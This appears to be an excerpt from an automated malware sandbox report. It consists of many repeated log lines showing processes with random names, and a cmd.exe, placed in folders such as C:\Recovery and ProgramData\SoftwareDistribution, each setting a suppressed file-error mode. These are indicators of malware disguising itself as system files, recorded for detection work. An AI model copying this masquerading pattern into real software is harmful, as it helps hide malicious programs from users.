Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
